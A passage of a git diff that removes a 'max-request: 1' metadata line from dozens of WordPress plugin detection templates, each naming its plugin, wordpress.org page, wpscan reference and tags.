--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
